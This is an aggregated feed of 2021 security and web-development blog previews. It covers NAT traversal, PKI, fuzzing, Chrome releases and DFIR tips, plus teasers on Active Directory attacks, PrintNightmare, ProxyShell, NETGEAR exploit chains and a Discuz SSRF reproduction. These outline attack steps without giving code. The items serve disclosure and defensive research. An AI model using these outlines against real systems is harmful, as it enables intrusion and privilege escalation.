    Translator's preface: This article is translated from a 2020 English blog post: How NAT traversal works. Consider this problem: there is one machine on a LAN in Beijing and another on a LAN in Shanghai (for example, a desktop at home and a laptop connected to a Starbucks WiFi). Both have private IP addresses but can reach the public Internet. How can these two machines communicate? Since both can reach the public Internet, the simplest approach is of course to set up a relay server on the public Internet: the two machines each connect to the relay service, which forwards traffic in both directions. This approach obviously has a large performance overhead, and the relay server easily becomes a bottleneck. Is there a way to let the two machines communicate directly, without a relay? If you have some background in networking and protocols, you will understand that this is possible. This epic-length article from Tailscale shows this "possibility" step by step, from the simple to the deep; if you fully implement the techniques it describes, you will end up with an enterprise-grade NAT/firewall traversal tool. Furthermore, as the author says, many interesting ideas in the decentralized software world, once simplified, come down to the problem of establishing an end-to-end direct connection across the public Internet, so the significance of this article is not limited to NAT traversal itself. Given the translator's limited ability, this article may contain omissions or errors. If in doubt, please consult the original. The translation follows. Translator's preface 1 Introduction 1.1 Background: IPv4 address shortage and the introduction of NAT 1.2 Requirement: establishing a peer-to-peer connection between two machines behind NAT 1.3 Solution: NAT traversal 1.3.1 Two prerequisites: UDP + direct control of the socket 1.3.2 Fallback: relaying 1.4 Challenge: stateful firewalls and NAT devices 2 Traversing firewalls 2.1 Stateful firewalls 2.1.1 Default behavior (policy) 2.1.2 How inbound and outbound packets are distinguished 2.2 Firewall orientation (face-off) and traversal schemes 2.2.1 Firewalls facing the same direction Scenario: the server IP is directly reachable Traversal scheme: the client connects directly to the server, or hub-and-s…

    Lateral Movement – WebClient
    Coercing elevated accounts such as machine accounts to authenticate to a host under the control of an attacker can provide an opportunity for privilege escalation… Continue reading → Lateral Movement – WebClient  ( 5 min )

    Fuzzing-101: learn how to fuzz like a real expert
    Article URL: https://github.com/antonio-morales/Fuzzing101 Comments URL: https://news.ycombinator.com/item?id=28923466 Points: 4 # Comments: 0  ( 3 min )
    The Challenges of Fuzzing 5G Protocols
    Article URL: https://research.nccgroup.com/2021/10/11/the-challenges-of-fuzzing-5g-protocols/ Comments URL: https://news.ycombinator.com/item?id=28917943 Points: 5 # Comments: 0  ( 11 min )
    SiliFuzz: Fuzzing CPUs by Proxy [pdf]
    Article URL: https://github.com/google/fuzzing/blob/master/docs/silifuzz.pdf Comments URL: https://news.ycombinator.com/item?id=28916409 Points: 1 # Comments: 0  ( 1 min )
    Autofuzz – Java fuzzing without writing fuzz targets
    Article URL: https://blog.code-intelligence.com/autofuzz Comments URL: https://news.ycombinator.com/item?id=28915778 Points: 3 # Comments: 1  ( 2 min )

    It Should Be ‘Cybersecurity Culture Month’
    It’s Cybersecurity Awareness Month, but security awareness is about much more than just dedicating a month to a few activities. Security awareness is a journey, requiring motivation along the way. And culture. Especially culture. That’s the point Proofpoint Cybersecurity Evangelist Brian Reed drove home in a recent appearance on Business Security Weekly. “If your security awareness program […] The post It Should Be ‘Cybersecurity Culture Month’ appeared first on Security Weekly.  ( 2 min )

    SiliFuzz: Fuzzing CPUs by Proxy [pdf]
    Article URL: https://raw.githubusercontent.com/google/fuzzing/master/docs/silifuzz.pdf Comments URL: https://news.ycombinator.com/item?id=28909004 Points: 11 # Comments: 0  ( 41 min )

    Resource Based Constrained Delegation
    Microsoft, in an attempt to provide more flexibility to domain users, enabled owners of resources to configure which accounts are trusted and allowed to delegate… Continue reading → Resource Based Constrained Delegation  ( 8 min )

    Extending Chrome App Support on Chrome OS
    Posted by Paul Rossman, Technical Program Manager, Chrome Today we're announcing an important update to the previously communicated Chrome app support timeline. Based on feedback from our Enterprise and Education customers and partners, we have made the decision to extend Chrome app support for those users on Chrome OS until at least January 2025.  We continue to invest and have made significant progress in rich new capabilities on the Web platform with Progressive Web Apps (PWA), and we recommend that Chrome app developers migrate to PWAs as soon as possible. PWAs are built and enhanced with modern APIs to deliver enhanced capabilities, reliability, and installability while reaching anyone, anywhere, on any device with a single codebase. There is a growing ecosystem of powerful desktop web apps & PWAs, from advanced graphics products like Adobe Spark to engaging media apps like YouTube TV to productivity and collaboration apps like Zoom. For additional support with Chrome app migration, please visit our Web apps on Chrome OS page. This page will be kept up to date as we progress together through this process. We thank our community of developers who have provided feedback to help us shape this modified and simplified approach. We are inspired by a future beyond Chrome apps, where the ecosystem continues forward progress leveraging open Web standards across all modern browsers.

    The Power of Developer-First Security
    Developers want to write good code. Secure code. Tools that optimize developer workflows for handling security issues can take a large burden off security practitioners and make triaging, understanding, prioritizing, and resolving vulnerabilities much easier and faster for the developer. That’s what DevSecOps is all about. One company that has developed such tools is GitLab. […] The post The Power of Developer-First Security appeared first on Security Weekly.  ( 2 min )

    Data Exfiltration, Revisited
    I've posted on the topic of data exfiltration before (here, etc.) but often it's a good idea to revisit the topic. After all, it was almost two years ago that we saw the first instance of ransomware threat actors stating publicly that they'd exfiltrated data from systems, using this as a secondary means of extortion. Since then, we've continued to see this tactic used, along with other tertiary means of extortion based on data exfiltration. We've also seen several instances where the threat actor ransom notes have stated that data was exfiltrated but the public "shaming" sites were noticeably empty. As long as I've been involved in what was first referred to as "information security" (later referred to as "cyber security"), data exfiltration has been a concern to one degree or another, even i…  ( 5 min )

    Show HN: Prebuilt gotip releases for quickly trying out Go 1.18 fuzzing/generics
    Article URL: https://github.com/clean8s/gotip-built Comments URL: https://news.ycombinator.com/item?id=28810470 Points: 4 # Comments: 0  ( 2 min )

    Tips for DFIR Analysts, pt III
    Learn to think critically. Don't take what someone says as gospel, just because they say it. Support findings with data, and clearly communicate the value or significance of something. Be sure to validate your findings, and never rest your findings on a single artifact. Find an entry for a file in the AmCache? Great. But does that mean it was executed on the system? No, it does not...you need to validate execution with other artifacts in the constellation (EDR telemetry, host-based effects such as an application prefetch file, Registry modifications, etc.). Have a thorough process, one that you can add to and extend. Why? Because things are always changing, and there's always something new. If you can automate your process, then so much the better...you're not losing time and enabling…  ( 7 min )
    EDR Bypasses
    During my time in the industry, I've been blessed to have opportunities to engage with a number of different EDR tools/frameworks at different levels. Mike Tanji offered me a look at Carbon Black before carbonblack.com existed, while it still used an on-prem database. I spent a very good deal of time working directly with Secureworks Red Cloak, and I've seen CrowdStrike Falcon and Digital Guardian's framework up close. I've seen the birth and growth of Sysmon, as well as MS's "internal" Process Tracking (which requires an additional Registry modification to record full command lines). I've also seen Nuix Adaptive Security up close (including seeing it used specifically for threat hunting), which rounds out my exposure. So, I haven't seen all tools by any stretch of the imagination, but mor…  ( 6 min )

    [Translation] For engineers: everything about certificates and public key infrastructure (PKI) (SmallStep, 2018)
    Translator's preface: This article is translated from a 2018 English blog post: Everything you should know about certificates and PKI but are too afraid to ask, by MIKE MALONE. This long article does not introduce PKI, X.509, OID and the other concepts in a dry, piecemeal way; instead it strings them together from the angle of cause and effect and historical evolution. The logic is very clear, so readers learn not only what, but why. The goal of certificates and PKI is actually simple: bind names to public keys. The evolution of the cryptographic approaches: MAC: the earliest way to check whether a message was tampered with; a verification code is attached when the message is sent | both parties share the same secret and compute a hash; the most common hash algorithm: HMAC | \/ Signature: solves some of the problems with MACs; the two parties no longer share the same secret but use a key pair | | \/ PKC: public key cryptography, also called asymmetric cryptography, the most common kind of signature | the public key is given to others, the private key is kept to yourself; | messages sent to me: others encrypt with *my public key*; I decrypt with my private key \/ Certificate: the foundation of public key cryptography; concepts: CA/issuer/subject/relying-party/... | by function, divided into two kinds | |---certificates used for *signing* (issuing other certificates) |---certificates used for *encryption and decryption* Certificate-related formats and how they relate (a heavy historical burden): the most common format | a format carrying more information than X.509 | other formats commonly used for mTLS etc. Java commonly…

    RenderingNG: an architecture that makes and keeps Chrome fast for the long term
    Our continual investments in the performance of Chrome have led to significant improvements in battery life, memory, and the speed of the web. This post in The Fast & the Curious series highlights the rendering journey of Chrome over the past eight years, a journey that has led to a browser that is better across the board. For example, Chrome 94, as compared with Chrome 93: is up to 8% more responsive on real pages, saves more than 1400 years of CPU time per day, and improves battery life by up to 0.5% In addition, recent versions of Chrome are much better than those of years past with: 150% or more faster graphics rendering, and greater reliability, due to a 6x reduction in GPU driver crashes on problematic hardware Introduction RenderingNG is a long-term project to systematically imp…

    Fuzzing with Postman
    For the ones who have never heard about fuzzing, here goes the short explanation: Continue reading on Medium »  ( 4 min )

    JavaScript Test Case Generator Based on Branch Coverage and Fuzzing
    Article URL: https://slashdot.org/submission/14707493/javascript-test-case-generator-based-on-branch-coverage-and-fuzzing Comments URL: https://news.ycombinator.com/item?id=28745108 Points: 1 # Comments: 1  ( 3 min )

    /r/netsec's Q4 2021 Information Security Hiring Thread
    Overview If you have open positions at your company for information security professionals and would like to hire from the /r/netsec user base, please leave a comment detailing any open job listings at your company. We would also like to encourage you to post internship positions as well. Many of our readers are currently in school or are just finishing their education. Please reserve top level comments for those posting open positions. Rules & Guidelines Include the company name in the post. If you want to be topsykret, go recruit elsewhere. Include the geographic location of the position along with the availability of relocation assistance or remote work. If you are a third party recruiter, you must disclose this in your posting. Please be thorough and upfront with the position details. Use of non-hr'd (realistic) requirements is encouraged. While it's fine to link to the position on your company's website, provide the important details in the comment. Mention if applicants should apply officially through HR, or directly through you. Please clearly list citizenship, visa, and security clearance requirements. You can see an example of acceptable posts by perusing past hiring threads. Feedback Feedback and suggestions are welcome, but please don't hijack this thread (use moderator mail instead). submitted by /u/ranok [link] [comments]  ( 26 min )

    Google's Beginner Quest 2021 - all tasks solved recording
    Google CTF nowadays is a pretty large event - or should I say 3 connected events, with the pretty hardcore main CTF being one of them, and Hackceler8 - where speedrunning meets CTFs and game hacking - being the second. The last one, but probably the most popular one, is Beginners Quest - a set of CTF challenges tied together with a story (a 001337 spy story in this specific case) and aimed at folks who like challenges, but prefer to take it easy in a stress-free (i.e. no scoreboard) environment. Anyway, yesterday I made an over 4 hour long livestream where I solved all the challenges from this year's BQ, and here's the recording - enjoy! Timeline (in order of solving): 15:46 - Task 1: CCTV (rev) 23:38 - Task 2: Logic Lock (misc) 34:27 - Task 3: High Speed Chase (misc) 49:25 - Task 5: Twisted robot (misc) 1:07:50 - Task 8: Hide and seek (misc) 1:22:10 - Task 10: Spycam (hw) 1:47:15 - Task 12: Old lock (web) 1:55:47 - Task 13: Noise on the wire (net) 2:04:45 - Task 15: Just another keypad (rev) 2:14:48 - Task 17: Playing golf (misc) 3:01:08 - Task 18: Strange Virtual Machine (rev) 3:41:49 - Task 4: Electronics Research Lab (hw) 3:51:41 - Task 6: To the moon (misc) 4:16:40 - Task 7: ReadySetAction (crypto) 4:25:30 - Task 9: Konski-Hiakawa Law of Droids (rev) 4:28:23 - Task 11: pwn-notebook (pwn) 4:41:59 - Task 14: web-quotedb (web) 4:45:04 - Task 16: Hash-meee (misc)

    Helping users explore the web and continue prior tasks
    When you’re looking for a certain piece of information or working on a project, your path through the internet likely isn’t a linear one. You might search for the same thing multiple times, jump between pages, head back to Google Search again, or parse through your history for that one page you can’t seem to find again. It can be challenging, and more importantly, it can take up time that you could be using to get things done. Now, we’re kicking off two new experiments with the goal of making it easier to navigate, explore and keep track of the things you find on the web. Continue your explorations of the web If you’ve already started exploring a topic and visited multiple sites along the way over a number of days or weeks, chances are you’ve found helpful information you might want to …

    Burp Suite Professional: feature roundup
    The modern web is an increasingly complex beast. Each passing year brings with it new frameworks, technologies, and design trends - not to mention vulnerabilities. All of this adds to your testing wor  ( 6 min )

    Training XSS Muscles
    XSS is all about practice. It requires a lot of time to print in the mind all vectors, payloads and tricks at our disposal. There are lots of XSS cases, each one requiring a different approach and construct to pop the alert box. Thinking on that and following the previous XSS Test Page released with … Continue reading Training XSS Muscles The post Training XSS Muscles appeared first on Brute XSS.

    FUZZING: Automating Bug Detection
    Sometimes hacking isn’t about taking a program apart: It’s about throwing random objects at it to see what breaks. Continue reading on OWASP VITCC »  ( 4 min )

    Case analysis of the DiscuzX 3.4 SSRF vulnerability
    0x00 Vulnerability overview: Crossday Discuz! Board (Discuz! for short) is a general-purpose community forum software system from Beijing Comsenz Technology Co., Ltd. (北京康盛新创科技有限责任公司). Since its release in June 2001, Discuz! has accumulated more than 15 years of application history and more than 2 million website deployments, and is one of the most mature and widely deployed forum systems in the world. The latest version, Discuz! X3.4, was officially released on 2 August 2017; it removes the cloud-platform code and is the stable version of X3.2. The vulnerability lies at line 54 of /source/module/misc/misc_imgcropper.php, where $prefix is controllable and leads to SSRF. Reference: Discuz x3.4 front-end SSRF analysis[1]. The vulnerability was disclosed on 3 December 2018 at: Discuz x3.4 front-end SSRF[2]; because that article is password-protected, a repost can be viewed at: repost address[3]. 0x01 Vulnerability analysis: The Discuz open-source repository is on Gitee[4]; clone it locally with git clone. Based on the patch commit record[5], switch to the commit before the vulnerability fix. After setting up the running environment locally, first visit the page http://www.a.com/dz/DiscuzX/upload/misc.php?mod=imgcropper, then click the crop button and capture the request. Intercept and replay the request, adding the parameters cutimg and picflag to the submitted content; fill in the IP address to be requested in the red box and send the request. The server then successfully receives the request. Now let's look at the backend…

    Imposter Syndrome
    Imposter Syndrome. This is something many of us have experienced to one degree or another, at various times. Many have experienced it, some have overcome it, others may not be able to and wonder why. HealthLine tells us, "Imposter feelings represent a conflict between your own self-perception and the way others perceive you." I would modify that slightly to, "...the way we believe others perceive us." Imposter syndrome is something internalized, and has very little to do with the outside world. I wanted to take the opportunity to share with you, the reader, what I've learned over the years about what's really happening in the world when we're having those feelings of imposter syndrome. Perception: I don't want to present at a conference, or ask a question at a conference, because everyone know…  ( 6 min )

    Chrome 95 Beta: Secure Payment Confirmation, WebAssembly Exception Handling and More
    Unless otherwise noted, changes described below apply to the newest Chrome beta channel release for Android, Chrome OS, Linux, macOS, and Windows. Learn more about the features listed here through the provided links or from the list on ChromeStatus.com. Chrome 95 is beta as of September 23, 2021. Origin Trials This version of Chrome introduces the origin trials described below. Origin trials allow you to try new features and give feedback on usability, practicality, and effectiveness to the web standards community. To register for any of the origin trials currently supported in Chrome, including the ones described below, visit the Chrome Origin Trials dashboard. To learn more about origin trials in Chrome, visit the Origin Trials Guide for Web Developers. Microsoft Edge runs its own origi…

    Dev.fuzz (fuzzing) merged in Golang tip
    Article URL: https://github.com/golang/go/commit/6e81f78c0f1653ea140e6c8d008700ddad1fa0a5 Comments URL: https://news.ycombinator.com/item?id=28604475 Points: 2 # Comments: 0  ( 7 min )
    Native fuzzing will be in Go 1.18
    Article URL: https://twitter.com/katie_hockman/status/1440082486692773897 Comments URL: https://news.ycombinator.com/item?id=28602233 Points: 1 # Comments: 0  ( 1 min )

    Building a More Secure AppDev Process
    Enterprises that integrate security testing into their CI/CD pipeline fix 91.4 percent of new issues, according to a progress report from ShiftLeft. Recent software supply chain attacks illustrate the growing risks businesses, their partners, and customers face. But a recent report suggests better outcomes for those who put security at the heart of app development. Data from […] The post Building a More Secure AppDev Process appeared first on Security Weekly.  ( 2 min )

    Software Fuzzing: What, Why, What next?
    Software development is a manual process and, more often than not, is the work of one or more developers with varied expertise and… Continue reading on Medium »  ( 5 min )

    Distros and RegRipper
    Over the years, every now and then I've taken a look around to try to see where RegRipper is used. I noticed early on that it's included in several security-oriented Linux distros. So, I took the opportunity to compile some of the links I'd found, and I then extended those a bit with some Googling. I will admit, I was a little surprised to see how far, over time, RegRipper has gone, from a "here, look at this" perspective. Not all of the below links are current; some are several years old. As such, they are not the latest and greatest; however, they may still apply and they may still be useful/valuable. RegRipper on Linux (Distros)  Kali, Kali GitLab  SANS SIFT  CAINE   Installing RegRipper on Linux  Install RRv2.8 on Ubuntu  CentOS RegRipper package  Arch Linux   RegRipper Docker Imag…  ( 5 min )
    On Writing DFIR Books, pt II
    Part I of this series kicked things off for us, and honestly I have no idea how long this series will be...I'm just writing the posts without a specific plan or outline for the series. In this case, I opted to take an organic approach, and wanted to see where it would go. Content Okay, so you have an idea for a book, but about...what? You may have a title or general idea, but what's the actual content you intend to write about? Is it more than a couple of paragraphs; can you actually create several solid chapters without having to use a lot of filler and fluff? Back when I was actively writing books, this was something on the forefront of my mind, not only because I was writing books, but later I got a question or two from others along these lines. In short, I write about stuff I know, or …  ( 5 min )

    PetitPotam – NTLM Relay to AD CS
    Deployment of an Active Directory Certificate Services (AD CS) on a corporate environment could allow system administrators to utilize it for establishing trust between different… Continue reading → PetitPotam – NTLM Relay to AD CS  ( 6 min )

    User-Agent Reduction Origin Trial and Dates
    Back in May, we published an update on our User-Agent string reduction plans with a promise to publish further details on timing. Now that we have an origin trial ready for testing the Reduced User-Agent header (and associated JS interfaces) we have estimated timelines to share. What follows is repeated from the original blog post, but contains estimated Chrome versions where these Phases will begin to help you prepare.  The Chromium schedule dashboard will be useful for understanding dates associated with each Chrome version and its progression from Canary into Beta and Stable Release. Note: The usual disclaimers about estimating engineering deadlines apply—unforeseen circumstances may dictate delays. But in the case that we encounter delays, we do not intend to accelerate timelines bet…

    [Translation] Role-based access control (RBAC): evolution, design philosophy and a concise implementation (Tailscale, 2021)
    Translator's preface: This article is translated from a 2021 English blog post: RBAC like it was meant to be. Many systems (for example Kubernetes and AWS) use some form of RBAC for permission/access control. Starting from the history of access control, this article analyzes at the design level the evolution DAC -> MAC -> RBAC -> ABAC, the strengths, weaknesses and applicable scenarios of each model, and then, starting from real requirements, designs step by step a practical, concise access control system that truly matches the RBAC philosophy. For comparison, if you want to see what a more expressive (but also more complex) RBAC/ABAC system looks like, study AWS's access control model. Given the translator's limited ability, this article may contain omissions or errors. If in doubt, please consult the original. The translation follows. Translator's preface 1 From DAC to MAC 1.1 DAC (discretionary access control): each file's owner sets the file's permissions Design Use case: file permission control for ordinary users 1.2 MAC (mandatory access control): file permissions are (mandatorily) set by a dedicated admin Design: a dedicated admin role introduced on top of DAC Example: TCP/UDP port numbers Use case: document/system access control 1.3 Two-factor login as MAC 1.4 Photo sharing: comparing the DAC and MAC models 1.5 The MAC concept: too many restrictions, yet seemingly none at all 2 First attempt: based on RBAC/ABAC 2.1 RBAC (role-based access control) 2.2 ABAC (attribute-based access control) 2.3 Maybe you have never used real RBAC Windows file security model: one ACL per file controls who can access which file 2.4 The problem: too many ACLs, duplicated everywhere, bulk changes are painful 3 Second attempt: one user group per ACL 3.1 Still…

    Account Persistence – Certificates
    It is not uncommon for organizations to implement an internal certification authority in order to establish trust between entities (users, computers etc.) or utilize it for… Continue reading → Account Persistence – Certificates  ( 7 min )

    Seventh Inferno vulnerability (some NETGEAR smart switches)
    TL;DR: NETGEAR just patched 3 reported vulnerabilities (Demon's Cries, Draconian Fear and Seventh Inferno) in some managed (smart) switches. If you or your company owns any of these devices, please patch now. P.S. This vulnerability and exploit chain is actually quite interesting technically. In short, it goes from a newline injection in the password field, through being able to write a file with constant uncontrolled content of 2 (like, one byte 32h), through a DoS and session crafting (which yields an admin web UI user), to an eventual post-auth shell injection (which yields full root). …

    Tips for DFIR Analysts, pt II
    On the heels of my first post with this subject, I thought I'd continue adding tips as they came to mind... I've been engaged with EDR frameworks for some time now. I first became aware of Carbon Black before it was "version 1.0", and before "carbonblack.com" existed. Since then, I've worked for several organizations that developed EDR frameworks (Secureworks, Nuix, CrowdStrike, Digital Guardian), and others that made use of frameworks created by others. I've also been very happy to see the development and growth of Sysmon, and used it in my own testing. One thing I've been acutely aware of is the visibility afforded by EDR frameworks, as well as the extent of that visibility. This is not a knock against these tools...not at all. EDR frameworks and tools are incredibly powerful, but they a…  ( 5 min )
    On Writing DFIR Books, pt I
    During my time in the industry, I've authored 9 books under three imprints, and co-authored a tenth. There, I said it. The first step in addressing a problem is admitting you have one. ;-) Seriously, though, this is simply to say that I have some experience, nothing more. During the latter part of my book writing experience, I saw others who wanted to do the same thing, but ran into a variety of roadblocks, roadblocks I'd long since navigated. As a result, I tried to work with the publisher to create a non-paid liaison role that would help new authors overcome many of those issues, so that a greater portfolio of quality books became available to the industry. By the time I convinced one editor of the viability and benefit of such a program, they had decided to leave their profession, and I…  ( 7 min )

    Draconian Fear vulnerability (some NETGEAR smart switches)
    TL;DR: NETGEAR just patched 3 reported vulnerabilities (Demon's Cries, Draconian Fear and Seventh Inferno) in some managed (smart) switches. If you or your company owns any of these devices, please patch now. Note: Details on Seventh Inferno will be published on or after 13th September. Affected devices: GC108P GC108PP GS108Tv3 GS110TPP GS110TPv3 GS110TUP GS308T GS310TP GS710TUP GS716TP GS716TPP GS724TPP GS724TPv2 GS728TPPv2 GS728TPv2 GS750E GS752TPP GS752TPv2 MS510TXM MS510TXUP …
    Demon's Cries vulnerability (some NETGEAR smart switches)
    TL;DR: NETGEAR just patched 3 reported vulnerabilities (Demon's Cries, Draconian Fear and Seventh Inferno) in some managed (smart) switches. If you or your company owns any of these devices, please patch now. Note: Details on Seventh Inferno will be published on or after 13th September. Affected devices: GC108P GC108PP GS108Tv3 GS110TPP GS110TPv3 GS110TUP GS308T GS310TP GS710TUP GS716TP GS716TPP GS724TPP GS724TPv2 GS728TPPv2 GS728TPv2 GS750E GS752TPP GS752TPv2 MS510TXM MS510…

    Kiterunner API Fuzzer (Windows Installation)
    Hello Friends, This post is to tell you about an API scanner called Kiterunner, I heard about it through Ms. Alissa Knight’s white paper “Go… Continue reading on Medium »

    OSInt, Doxing And Cyberstalking Page Updated
    Link: http://www.irongeek.com/i.php?page=security/doxing-footprinting-cyberstalking I added (https://usersearch.org) to the site. I also moved dead links to the bottom of the page. If you know sites/tools I should add, please contact me. The site has gotten a bit dated I think.

    Web App and API Security Needs to Be Modernized: Here’s How
    Applications are critical for doing business. They are also the weakest links in many an organization’s security chain. Many APIs continue to expose the personally identifiable information of customers, employees and contractors. As OWASP (Open Web Application Security Project) notes on its API Security Project homepage: “By nature, APIs expose application logic and sensitive data […] The post Web App and API Security Needs to Be Modernized: Here’s How appeared first on Security Weekly.  ( 2 min )

    Building a Career in CyberSecurity
    There's been a lot of discussion on social media around how to "break into" the cybersecurity field, not only for folks just starting out but also for those looking for a career change. This is not unusual, given what we've seen in the public news media around cyber attacks and ransomware; the idea is that cybersecurity is an exploding career field that is completely "green fields", with an incredible amount of opportunity. Jax Scott recently shared a YouTube video (be sure to comment and subscribe!) where she provides five steps to level up any career, based on her "must read for anyone seeking a career in cybersecurity" blog post. Jax makes a lot of great points, and rather than running through each one and giving my perspective, I thought I'd elaborate a bit on one in particular. Jax's …  ( 4 min )

    Chrome 94 Beta: WebCodecs, WebGPU, Scheduling, and More
    Unless otherwise noted, changes described below apply to the newest Chrome beta channel release for Android, Chrome OS, Linux, macOS, and Windows. Learn more about the features listed here through the provided links or from the list on ChromeStatus.com. Chrome 94 is beta as of August 26, 2021. WebCodecs Existing media APIs (HTMLMediaElement, Media Source Extensions, WebAudio, MediaRecorder, and WebRTC) are high-level and narrowly-focused. A low-level codec API would better support emerging applications, such as latency-sensitive game streaming, client-side effects or transcoding, and polyfillable media container support, without the increased network and CPU cost of JavaScript or WebAssembly codec implementations. The WebCodecs API eliminates these deficiencies by giving programmers a w…

    Tips for DFIR Analysts
    Over the years as a DFIR analyst...first doing digital forensics analysis, and then incorporating that analysis as a component of IR activity...there have been some stunningly simple truths that I've learned, truths that I thought I'd share. Many of these "tips" are truisms that I've seen time and time again, and recognized that they made much more sense and had more value when they were "named". Tips, Thought, and Stuff to Think About Computer systems are a finite, deterministic space. The adversary can only go so far, within memory or on the hard drive. When monitoring computer systems and writing detections, the goal is not to write the perfect detection, but rather to force the adversary into a corner, so that no matter what they do, they will trigger something. So, it's a good thing to…  ( 9 min )

    Burp extensions added to Burp Suite Enterprise Edition
    Burp Extensions (and your own custom extensions) will now be supported by Burp Suite Enterprise Edition, brand new for the 2021.8 release. If you've had much experience with Burp Suite Professional, i  ( 5 min )

    It's now easier than ever to scan at scale with Burp Suite Enterprise Edition
    774 organizations in 68 countries are now using Burp Suite Enterprise Edition to improve and scale security across their web portfolios. As we pass the three-year anniversary of development on Burp Su  ( 4 min )

    A New Attack Surface on MS Exchange Part 3 - ProxyShell!
    No content preview

    The history of OAST in Burp Suite
    At PortSwigger, we pride ourselves on pushing the boundaries of web security. Just take a peek at some of our researchers' recent and upcoming talks from the likes of Black Hat and DEF CON if you'd li  ( 4 min )

    Domain Escalation – PrintNightmare
    Printers are part of every corporate infrastructure; therefore, Windows environments have a number of embedded printer drivers installed. The Print Spooler (spoolsv.exe) service is responsible… Continue reading → Domain Escalation – PrintNightmare  ( 5 min )

    A New Attack Surface on MS Exchange Part 1 - ProxyLogon!
    No content preview
    A New Attack Surface on MS Exchange Part 2 - ProxyOracle!
    No content preview

    Making numbers out of thin air, Python bytecode edition

    Detailed analysis of the latest Windows Print Spooler service vulnerability, CVE-2021-34527
    Recently, a security researcher published on GitHub an exploit named PrintNightmare for "CVE-2021-1675". It was later verified that the published exploit targets a vulnerability different from CVE-2021-1675, and Microsoft assigned it a new identifier, CVE-2021-34527. This article records the process of reproducing CVE-2021-34527 and gives a brief analysis of the vulnerability's root cause. Vulnerability reproduction: This section records the process of obtaining an RCE reverse shell as nt authority\system on a domain controller using an ordinary-privilege domain account. The reproduction and analysis below are based on Windows Server 2019 with the 2021-06 patches, winver=17763.1999. In the author's testing, RCE could also be reproduced with the following steps on a Windows Server 2019 with no patches at all, winver=17763.107. Environment configuration: The conditions for achieving RCE are as follows: 1. An ordinary-privilege domain account, used on another computer to log in and join the domain environment. The domain account's permissions are as follows. 2. The domain controller must be able to reach a shared directory on the computer logged in with the above configuration; on Windows this can be done with SMB by running the following command from an administrator PowerShell. After running the command, reboot for it to take effect. Reproduction: There are 2 public exploits on GitHub, the Python version https://github.com/cube0x0/CVE-2021-1675 and the C++ version https://github.com/afwu/PrintNightmare, the latter forked from the exploit published by Zhiniang Peng (@edwardzpeng) & Xuefeng Li (@lxf02942370). Both versions work on the same principle and both are usable; the Python version needs to be installed according to its documentation…

    OISF 2021 Videos
    These are the videos from the OISF Anniversary Event.
    Opening Remarks - OISF President
    Inside the Mind of a Threat Actor: Beyond Pentesting - Phillip Wylie
    I Got 99 Problems but a WAF ain't one - Micah Brown
    Code Hedgehogs - Changing the "S" in SDLC to Secure - Penelope Rozhkova
    A Look at Cellular Services in IoT technology - Deral Heiland
    Chats, Cheats, and Cracks: Abuse of Collaboration Platforms in Malware Campaigns - Edmund Brumaghin
    Lend me your IR's! - Matt Scheurer
    Download from: https://archive.org/details/oisf2021

    ClickMeeting minor privacy weakness (fixed)
    Just a short reminder to anonymize data on the server side and not in the browser, illustrated by a small privacy vulnerability I've found during, well, a security talk I've attended that took place on the ClickMeeting platform (it was still 10 minutes before the talk began, you understand). Props to ClickMeeting for a fast reaction time and good communication - this bug is long fixed (reported on April 7th 2021). Original report (though redacted a bit) follows: Hey folks, I've joined a webinar hosted on the clickmeeting platform today, and noticed one thing which I found curious. The webinar I attended had chat enabled, however there seems to be some "privacy mode" enabled for attendees - i.e. the chat didn't display the list of people (which is pretty standard…

    popen+cat explained
    A few days ago I tweeted about this "open and read a file with popen+cat" gem I found in the firmware of one of NETGEAR's devices: How to read a file in C according to NETGEAR pic.twitter.com/TRbxWC5vsY — Gynvael Coldwind (@gynvael) July 1, 2021 Since there were some questions about "why is this a bad pattern?", I decided to write a short blog post explaining this. But before we get there, please also see this short thread, or just remember to not blame an individual engineer for writing that code – rather blame the procedures NETGEAR has with regards to secure code development and quality assurance. Context? Let's start by adding some more context to this tweet – where is this code from, and is it the source code or something else? This code was found in the firm…

    Gears of Chaos vulnerability chain (NETGEAR WAC104 access point)
    As mentioned in the previous post, the NETGEAR WAC104 access point just had a couple of vulnerabilities patched and you should upgrade its firmware now if you own such a device at your company or at home (or anywhere else). [Photo: a NETGEAR WAC104 access point without the casing.] Actually there might be more affected devices: WAC104 - fix available; WNDR3700v5 - might be vulnerable (unconfirmed), …

    WAC104 vulnerabilities - please go patch (details on Monday)
    Just a short post (I will publish a longer one with details on Monday) – if you have the following NETGEAR access point, you should upgrade your firmware now: WAC104. NETGEAR's advisory and the firmware can be found here: Security Advisory for Authentication Bypass on WAC104, PSV-2021-0075; WAC104 — Dual Band 802.11ac Wireless Access Point – Firmware and Software Downloads. Please note that NETGEAR assigned a CVSS v3.1 score of 8.8 (High), which is incorrect (unless I misread the CVSS specification) - it's actually 9.8 (Critical): Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H. This firmware also fixes a couple of other vulnerabilities with lower CVSS scores. More details on Monday. P.S. This vulnerability chain is dubbed Gears of Chaos (in line with my sense of humor).

    BSides Cleveland 2021 Videos
    These are the videos from the BSides Cleveland conference. Thanks to Rich and securid as the video team. Thanks to twuntymcslore & RockieBrockway for being con mom & dad. These are the first con recordings I've done in 1 year and 3 months. It seems something may have changed after some updates. These OBS videos have variable audio sync problems that are not a set number of milliseconds I could easily set the same sync settings to. I fixed them the best I could, but I've included the raw files if someone can figure out a better way to fix variable sync delays. Contact me if you find a better way. Ministraitor (my European counterpart that does more cons than me) gave me some tips to fix future problems.
    Intro - Rockie Brockway
    I Don't Know Snow: Computer Forensics Case Files - Tyler Hudak
    Improving Cyber Security - Alex Kot
    Lend Me Your IRs - Matt Scheurer
    Tale From The Audit - Justin Leapline
    Table Top - Jeremy Mio
    Vulnerability Disclosure Policies: Hack Responsibly - MzBat
    Pentest Stories - Justin Bollinger
    Advisor Person - Rick Yocum

    TryHackMe > Unbaked Pie
